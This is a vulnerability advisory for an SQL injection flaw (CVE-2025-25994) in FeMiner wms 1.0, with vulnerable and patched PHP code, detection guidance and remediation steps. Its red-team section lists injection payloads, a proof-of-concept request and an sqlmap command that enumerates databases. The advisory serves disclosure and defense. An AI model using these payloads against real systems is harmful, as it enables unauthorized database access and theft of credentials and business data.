CVE-2025-25994
Executive Summary
CVE-2025-25994 is a critical SQL Injection vulnerability discovered in FeMiner wms version 1.0. The flaw allows a remote, unauthenticated attacker to inject arbitrary SQL commands through the date1, date2, and id parameters. Successful exploitation can lead to unauthorized access to sensitive database information, including user credentials, business data, and potentially full database compromise. No official patch has been released by the vendor, and no public exploit code or Nuclei template is currently available. The vulnerability is classified under CWE-89 (SQL Injection) and aligns with MITRE ATT&CK tactic T1190 (Exploit Public-Facing Application).

Supply Chain & Package Security
This vulnerability does not affect any NPM, PyPI, Go, or Ruby packages. It is a standalone web application (FeMiner wms 1.0) and should be treated as a custom software supply chain risk. Organizations using this software must assess their exposure and implement compensating controls immediately.
CVSS Breakdown & Threat Level
While no official CVSS vector is provided, based on the nature of the vulnerability (remote, unauthenticated SQL injection), the estimated CVSS v3.1 score is 9.8 (Critical).
- Attack Vector (AV): Network
- Attack Complexity (AC): Low
- Privileges Required (PR): None
- User Interaction (UI): None
- Scope (S): Unchanged
- Confidentiality (C): High
- Integrity (I): High
- Availability (A): High
Threat Level: Critical – Immediate action required.
Deep Dive & Mechanics
The vulnerability resides in the handling of HTTP GET/POST parameters date1, date2, and id within the FeMiner wms application. The application fails to sanitize or parameterize user input before constructing SQL queries. An attacker can inject SQL metacharacters (e.g., single quote ', double dash --, or OR 1=1) to manipulate the query logic.
Example vulnerable code snippet (conceptual):
$sql = "SELECT * FROM orders WHERE date BETWEEN '" . $_GET['date1'] . "' AND '" . $_GET['date2'] . "' AND id = " . $_GET['id'];
This allows an attacker to break out of the string context and execute arbitrary SQL commands, such as:
' OR '1'='1' --
The injection can be used to extract data from other tables, bypass authentication, or even execute system commands if the database user has sufficient privileges.
Vulnerable vs. Patched Code
Vulnerable Code (FeMiner wms 1.0):
$date1 = $_GET['date1'];
$date2 = $_GET['date2'];
$id = $_GET['id'];
$query = "SELECT * FROM reports WHERE date BETWEEN '$date1' AND '$date2' AND id = $id";
$result = mysqli_query($conn, $query);
Patched Code (Recommended):
$date1 = mysqli_real_escape_string($conn, $_GET['date1']);
$date2 = mysqli_real_escape_string($conn, $_GET['date2']);
$id = (int)$_GET['id'];
$query = "SELECT * FROM reports WHERE date BETWEEN '$date1' AND '$date2' AND id = $id";
$result = mysqli_query($conn, $query);
Alternatively, use prepared statements:
$stmt = $conn->prepare("SELECT * FROM reports WHERE date BETWEEN ? AND ? AND id = ?");
$stmt->bind_param("ssi", $_GET['date1'], $_GET['date2'], $_GET['id']);
$stmt->execute();
Exploitation & Lab Setup
Red Team (Offensive)
Lab Setup:
- Deploy FeMiner wms 1.0 on a local server (e.g., XAMPP, LAMP).
- Ensure the application is accessible via HTTP.
Exploitation Steps:
- Identify the vulnerable endpoint (e.g.,
/reports.php). - Inject SQL payloads into
date1,date2, oridparameters.
Example payloads:
date1=2025-01-01' OR '1'='1' --id=1 UNION SELECT 1,2,3,@@version,5,6,7--
Proof-of-Concept (PoC) request:
GET /reports.php?date1=2025-01-01' OR '1'='1' -- &date2=2025-12-31&id=1 HTTP/1.1
Host: target.com
Automation with sqlmap:
sqlmap -u "http://target.com/reports.php?date1=2025-01-01&date2=2025-12-31&id=1" --batch --dbs
Blue Team (Defensive)
Detection Steps:
- Monitor web server logs for suspicious SQL keywords (e.g.,
UNION,SELECT,OR 1=1). - Deploy a Web Application Firewall (WAF) with SQL injection rules.
- Use database activity monitoring to detect anomalous queries.
Mitigation:
- Apply input validation and parameterized queries immediately.
- Restrict database user privileges to least privilege.
- If patching is not possible, consider taking the application offline or behind a VPN.
Indicators of Compromise (IOCs)
Network IOCs:
- HTTP requests containing SQL keywords in
date1,date2, oridparameters. - Unusual database error messages in HTTP responses (e.g., "You have an error in your SQL syntax").
- HTTP requests containing SQL keywords in
File IOCs:
- Log entries with patterns like
' OR '1'='1'orUNION SELECT.
- Log entries with patterns like
Database IOCs:
- Unexpected queries to
information_schematables. - New user accounts or data exfiltration patterns.

Remediation & Mitigation
Immediate:
- Disable the vulnerable parameters or restrict access to the application via firewall rules.
- Implement a Web Application Firewall (WAF) with SQL injection signatures.
Short-term:
- Apply input validation and parameterized queries as shown in the patched code section.
- Contact the vendor for an official patch; if unavailable, consider migrating to an alternative solution.
Long-term:
- Conduct a full security audit of the application.
- Implement secure coding practices (OWASP Top 10).
- Regularly update and patch all software components.
